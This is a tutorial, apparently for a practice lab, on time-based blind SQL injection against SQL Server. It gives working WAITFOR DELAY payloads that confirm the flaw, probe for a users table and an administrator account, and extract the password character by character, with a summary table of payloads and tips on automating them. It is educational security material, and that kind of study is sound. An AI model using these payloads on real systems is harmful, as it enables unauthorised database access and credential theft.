π― Objective
Demonstrate how to exploit a blind SQL injection vulnerability when:
- The application does not return any visible output.
- Error messages are suppressed or handled gracefully.
- No conditional response difference is observed.
In such cases, we can use time-based blind SQL injection β where the attacker forces the database to wait (delay) for a certain amount of time depending on whether an injected condition is TRUE or FALSE.
This delay allows us to infer sensitive data one character at a time based on how long it takes for the HTTP response to arrive.
π Key Concepts
1οΈβ£ Blind SQL Injection
A type of SQL injection where the attacker cannot see the results of their query. There's no direct output or error message returned from the application.
There are two main types:
-
Content-based blind SQLi: Application behavior changes slightly based on result (
"Welcome back"vs nothing). - Time-based blind SQLi: Application always behaves the same β only response time reveals the result.
2οΈβ£ Time-Based Detection
When the application suppresses all output and errors, we force the database to pause using built-in functions like:
| DBMS | Delay Function |
|---|---|
| SQL Server | WAITFOR DELAY '0:0:10' |
| MySQL |
SLEEP(10) or BENCHMARK()
|
| PostgreSQL | pg_sleep(10) |
| Oracle | DBMS_LOCK.SLEEP(10) |
If the HTTP response is delayed, it indicates that the injected condition was TRUE.
π οΈ Step-by-Step Attack Walkthrough
Letβs assume we're targeting a vulnerable web application that uses a TrackingId cookie to perform a SQL query in the backend.
We suspect SQL injection is possible but:
- No output is returned
- No visible error messages
- We observe no change in content or behavior
β‘οΈ So we switch to time-based blind SQL injection.
β Step 1: Confirm Vulnerability Using Time Delay
Test if we can trigger a delay with a known TRUE and FALSE condition.
π₯ Payload (TRUE condition):
'; IF (1=1) WAITFOR DELAY '0:0:10'--
π₯ Payload (FALSE condition):
'; IF (1=2) WAITFOR DELAY '0:0:10'--
π‘ Result:
- First request delays ~10 seconds β Condition is
TRUE - Second request returns immediately β Condition is
FALSE
β Confirmed: We can control execution timing via SQL conditions.
β Step 2: Test for Table Existence
Now test if the users table exists:
π₯ Payload:
'; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'--
π‘ Result:
- If there is a 10-second delay, the
userstable exists β
β Step 3: Check for Administrator User
Next, check if the username 'administrator' exists in the users table.
π₯ Payload:
'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator') > 0 WAITFOR DELAY '0:0:10'--
π‘ Result:
- Delay occurs β
administratoruser exists β
β Step 4: Extract Password Character by Character
Now extract the password one character at a time using SUBSTRING() and ASCII() comparisons.
π₯ Payload (Check if first letter > 'm'):
'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator' AND ASCII(SUBSTRING(password, 1, 1)) > 109) = 1 WAITFOR DELAY '0:0:10'--
π Repeat this process for each character position and binary search through ASCII values (a-z, A-Z, 0-9) to determine the exact character.
You can automate this using:
- Burp Intruder
- Python script with requests + timing analysis
π Example: Binary Search Through Characters
Suppose we want to find the first character of the password:
- Try
'a'to'z'using timing differences. - Use binary search logic to narrow down faster.
Example payloads:
'; IF (ASCII(SUBSTRING(password,1,1)) > 97) WAITFOR DELAY '0:0:10'-- # Is it after 'a'?
'; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- # Is it after 'd'?
Eventually, youβll pinpoint the correct character.
π§Ύ Summary of Key Queries
| Purpose | Payload |
|---|---|
| Confirm SQLi | ' |
| Trigger delay (TRUE) | '; IF (1=1) WAITFOR DELAY '0:0:10'-- |
| Trigger delay (FALSE) | '; IF (1=2) WAITFOR DELAY '0:0:10'-- |
| Check table existence | '; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'-- |
| Check admin user | '; IF (SELECT COUNT(*) FROM users WHERE username='administrator') > 0 WAITFOR DELAY '0:0:10'-- |
| Extract password char | '; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- |
π§ Takeaways
- When no output or error is available, time-based SQL injection is your best bet.
- Use built-in delay functions specific to the database engine.
- Use binary search to speed up password extraction.
- Automate testing with Burp Intruder or custom scripts.
- Even without seeing output, you can infer secrets via timing side channels.
π Final Notes
Time-based SQL injection is a powerful technique for exploiting silent vulnerabilities. While slower than other methods, it works even when:
- Output is completely suppressed.
- Errors are handled gracefully.
- The application shows no visible change.
With patience and automation, attackers can extract full databases β including usernames, passwords, and API keys β just by measuring how long it takes for a server to respond.
π Final Words
Great job understanding and applying time-based blind SQL injection! Youβve now mastered one of the most stealthy and effective techniques in ethical hacking.
Happy hacking! π»β‘π΅οΈββοΈ
Top comments (1)
Some comments may only be visible to logged-in visitors. Sign in to view all comments.